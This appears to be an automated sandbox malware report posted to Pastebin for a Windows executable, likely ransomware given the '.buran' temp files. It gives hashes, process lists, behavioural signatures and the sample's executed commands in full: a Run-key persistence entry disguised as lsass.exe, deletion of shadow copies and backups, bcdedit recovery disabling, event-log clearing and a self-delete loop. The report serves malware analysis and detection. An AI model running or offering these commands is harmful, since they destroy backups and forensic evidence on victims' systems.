2311Exes_636d3c669e36510bf337fd2f1ea64732_tmp_2019-09-18_14_30.txt

Sep 18th, 2019
1,354
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 83.27 KB | None | 0 0
  1.  
  2. * ID: 2311
  3. * MalFamily: "Malicious"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
  8. * File Size: 435200
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
  11. * MD5: "636d3c669e36510bf337fd2f1ea64732"
  12. * SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
  13. * SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
  14. * CRC32: "D4F2AC3B"
  15. * SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
  16.  
  17. * Process Execution:
  18. "OQyoOv9HxQ.exe",
  19. "cmd.exe",
  20. "reg.exe",
  21. "lsass.exe",
  22. "cmd.exe",
  23. "cmd.exe",
  24. "cmd.exe",
  25. "cmd.exe",
  26. "cmd.exe",
  27. "cmd.exe",
  28. "cmd.exe",
  29. "WMIC.exe",
  30. "cmd.exe",
  31. "vssadmin.exe",
  32. "cmd.exe",
  33. "reg.exe",
  34. "cmd.exe",
  35. "reg.exe",
  36. "cmd.exe",
  37. "reg.exe",
  38. "cmd.exe",
  39. "attrib.exe",
  40. "cmd.exe",
  41. "cmd.exe",
  42. "wevtutil.exe",
  43. "cmd.exe",
  44. "wevtutil.exe",
  45. "cmd.exe",
  46. "wevtutil.exe",
  47. "cmd.exe",
  48. "sc.exe",
  49. "lsass.exe",
  50. "lsass.exe",
  51. "cmd.exe",
  52. "PING.EXE",
  53. "PING.EXE",
  54. "PING.EXE",
  55. "PING.EXE",
  56. "PING.EXE",
  57. "PING.EXE",
  58. "PING.EXE",
  59. "PING.EXE",
  60. "PING.EXE",
  61. "PING.EXE",
  62. "PING.EXE",
  63. "PING.EXE",
  64. "PING.EXE",
  65. "PING.EXE",
  66. "PING.EXE",
  67. "PING.EXE",
  68. "PING.EXE",
  69. "PING.EXE",
  70. "PING.EXE",
  71. "PING.EXE",
  72. "PING.EXE",
  73. "PING.EXE",
  74. "PING.EXE",
  75. "PING.EXE",
  76. "PING.EXE",
  77. "PING.EXE",
  78. "PING.EXE",
  79. "PING.EXE",
  80. "PING.EXE",
  81. "PING.EXE",
  82. "PING.EXE",
  83. "PING.EXE",
  84. "PING.EXE",
  85. "PING.EXE",
  86. "PING.EXE",
  87. "PING.EXE",
  88. "PING.EXE",
  89. "PING.EXE",
  90. "PING.EXE",
  91. "PING.EXE",
  92. "PING.EXE",
  93. "PING.EXE",
  94. "PING.EXE",
  95. "PING.EXE",
  96. "PING.EXE",
  97. "PING.EXE",
  98. "PING.EXE",
  99. "PING.EXE",
  100. "PING.EXE",
  101. "PING.EXE",
  102. "PING.EXE",
  103. "PING.EXE",
  104. "PING.EXE",
  105. "PING.EXE",
  106. "PING.EXE",
  107. "PING.EXE",
  108. "PING.EXE",
  109. "PING.EXE",
  110. "PING.EXE",
  111. "PING.EXE",
  112. "PING.EXE",
  113. "PING.EXE",
  114. "PING.EXE",
  115. "PING.EXE",
  116. "PING.EXE",
  117. "PING.EXE",
  118. "PING.EXE",
  119. "PING.EXE",
  120. "PING.EXE",
  121. "PING.EXE",
  122. "PING.EXE",
  123. "PING.EXE",
  124. "PING.EXE",
  125. "PING.EXE",
  126. "PING.EXE",
  127. "PING.EXE",
  128. "PING.EXE",
  129. "PING.EXE",
  130. "PING.EXE",
  131. "PING.EXE",
  132. "PING.EXE",
  133. "services.exe",
  134. "svchost.exe",
  135. "WmiPrvSE.exe",
  136. "svchost.exe",
  137. "taskeng.exe",
  138. "taskeng.exe",
  139. "msoia.exe",
  140. "msoia.exe",
  141. "taskeng.exe",
  142. "WMIADAP.exe",
  143. "taskeng.exe",
  144. "VSSVC.exe"
  145.  
  146.  
  147. * Executed Commands:
  148. "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
  149. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
  150. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
  151. "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )",
  152. "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )",
  153. "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
  154. "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
  155. "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
  156. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
  157. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
  158. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
  159. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
  160. "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
  161. "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
  162. "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
  163. "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
  164. "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
  165. "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
  166. "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
  167. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
  168. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
  169. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
  170. "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
  171. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
  172. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
  173. "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
  174. "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
  175. "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
  176. "taskeng.exe DA0ED248-9EDB-4144-B9E7-AFC1D00A662A S-1-5-18:NT AUTHORITY\\System:Service:",
  177. "taskeng.exe A14B62F8-6D27-44D8-BFCB-66F44117F2A4 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  178. "taskeng.exe 4C64B42C-C15C-4AFB-9A31-7317BC95FE05 S-1-5-18:NT AUTHORITY\\System:Service:",
  179. "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
  180. "taskeng.exe F7093373-6201-40B8-8D09-6E7E59E028EB S-1-5-18:NT AUTHORITY\\System:Service:",
  181. "C:\\Windows\\system32\\vssvc.exe",
  182. "vssadmin delete shadows /all /quiet",
  183. "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
  184. "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
  185. "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
  186. "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
  187. "wevtutil.exe clear-log Application",
  188. "wevtutil.exe clear-log Security",
  189. "wevtutil.exe clear-log System",
  190. "sc config eventlog start=disabled",
  191. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
  192. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
  193. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
  194.  
  195.  
  196. * Signatures Detected:
  197.  
  198. "Description": "Behavioural detection: Executable code extraction",
  199. "Details":
  200.  
  201.  
  202. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  203. "Details":
  204.  
  205.  
  206. "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
  207. "Details":
  208.  
  209. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  210.  
  211.  
  212. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  213.  
  214.  
  215. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  216.  
  217.  
  218. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
  219.  
  220.  
  221. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
  222.  
  223.  
  224. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
  225.  
  226.  
  227. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
  228.  
  229.  
  230. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  231.  
  232.  
  233. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
  234.  
  235.  
  236. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  237.  
  238.  
  239. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  240.  
  241.  
  242. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  243.  
  244.  
  245. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
  246.  
  247.  
  248. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
  249.  
  250.  
  251. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  252.  
  253.  
  254. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  255.  
  256.  
  257. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  258.  
  259.  
  260. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
  261.  
  262.  
  263.  
  264.  
  265. "Description": "Possible date expiration check, exits too soon after checking local time",
  266. "Details":
  267.  
  268. "process": "lsass.exe, PID 2296"
  269.  
  270.  
  271.  
  272.  
  273. "Description": "Anomalous file deletion behavior detected (10+)",
  274. "Details":
  275.  
  276. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran"
  277.  
  278.  
  279. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran"
  280.  
  281.  
  282. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  283.  
  284.  
  285. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  286.  
  287.  
  288. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  289.  
  290.  
  291. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  292.  
  293.  
  294. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  295.  
  296.  
  297. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  298.  
  299.  
  300. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  301.  
  302.  
  303. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  304.  
  305.  
  306. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  307.  
  308.  
  309. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  310.  
  311.  
  312. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  313.  
  314.  
  315. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  316.  
  317.  
  318. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  319.  
  320.  
  321. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  322.  
  323.  
  324. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  325.  
  326.  
  327. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  328.  
  329.  
  330. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  331.  
  332.  
  333. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  334.  
  335.  
  336. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  337.  
  338.  
  339. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  340.  
  341.  
  342. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  343.  
  344.  
  345. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  346.  
  347.  
  348. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  349.  
  350.  
  351. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  352.  
  353.  
  354. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  355.  
  356.  
  357. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  358.  
  359.  
  360. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  361.  
  362.  
  363. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  364.  
  365.  
  366. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  367.  
  368.  
  369. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  370.  
  371.  
  372. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  373.  
  374.  
  375. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  376.  
  377.  
  378. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  379.  
  380.  
  381. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  382.  
  383.  
  384. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  385.  
  386.  
  387. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  388.  
  389.  
  390. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  391.  
  392.  
  393. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  394.  
  395.  
  396. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  397.  
  398.  
  399. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  400.  
  401.  
  402. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  403.  
  404.  
  405. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  406.  
  407.  
  408. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  409.  
  410.  
  411. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  412.  
  413.  
  414. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  415.  
  416.  
  417. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  418.  
  419.  
  420. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  421.  
  422.  
  423. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  424.  
  425.  
  426. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  427.  
  428.  
  429. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  430.  
  431.  
  432. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  433.  
  434.  
  435. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  436.  
  437.  
  438. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  439.  
  440.  
  441. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  442.  
  443.  
  444. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  445.  
  446.  
  447. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  448.  
  449.  
  450. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  451.  
  452.  
  453. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  454.  
  455.  
  456. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  457.  
  458.  
  459. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  460.  
  461.  
  462. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  463.  
  464.  
  465. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  466.  
  467.  
  468. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  469.  
  470.  
  471. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  472.  
  473.  
  474. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  475.  
  476.  
  477. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  478.  
  479.  
  480. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  481.  
  482.  
  483. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  484.  
  485.  
  486. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  487.  
  488.  
  489. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  490.  
  491.  
  492. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  493.  
  494.  
  495. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  496.  
  497.  
  498. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  499.  
  500.  
  501. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  502.  
  503.  
  504. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  505.  
  506.  
  507. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  508.  
  509.  
  510. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  511.  
  512.  
  513. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  514.  
  515.  
  516. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  517.  
  518.  
  519. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  520.  
  521.  
  522. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  523.  
  524.  
  525. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
  526.  
  527.  
  528. "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  529.  
  530.  
  531.  
  532.  
  533. "Description": "Guard pages use detected - possible anti-debugging.",
  534. "Details":
  535.  
  536.  
  537. "Description": "A process attempted to delay the analysis task.",
  538. "Details":
  539.  
  540. "Process": "WmiPrvSE.exe tried to sleep 361 seconds, actually delayed analysis time by 0 seconds"
  541.  
  542.  
  543. "Process": "PING.EXE tried to sleep 345 seconds, actually delayed analysis time by 0 seconds"
  544.  
  545.  
  546. "Process": "svchost.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  547.  
  548.  
  549. "Process": "taskeng.exe tried to sleep 488 seconds, actually delayed analysis time by 0 seconds"
  550.  
  551.  
  552.  
  553.  
  554. "Description": "Performs HTTP requests potentially not found in PCAP.",
  555. "Details":
  556.  
  557. "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
  558.  
  559.  
  560.  
  561.  
  562. "Description": "A process created a hidden window",
  563. "Details":
  564.  
  565. "Process": "OQyoOv9HxQ.exe -> C:\\Windows\\System32\\cmd.exe"
  566.  
  567.  
  568. "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
  569.  
  570.  
  571.  
  572.  
  573. "Description": "Executed a command line with /V argument which modifies variable behaviour and whitespace allowing for increased obfuscation options",
  574. "Details":
  575.  
  576. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  577.  
  578.  
  579.  
  580.  
  581. "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
  582. "Details":
  583.  
  584. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  585.  
  586.  
  587.  
  588.  
  589. "Description": "A ping command was executed with the -n argument possibly to delay analysis",
  590. "Details":
  591.  
  592. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
  593.  
  594.  
  595. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
  596.  
  597.  
  598. "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
  599.  
  600.  
  601.  
  602.  
  603. "Description": "Uses Windows utilities for basic functionality",
  604. "Details":
  605.  
  606. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  607.  
  608.  
  609. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  610.  
  611.  
  612. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  613.  
  614.  
  615. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
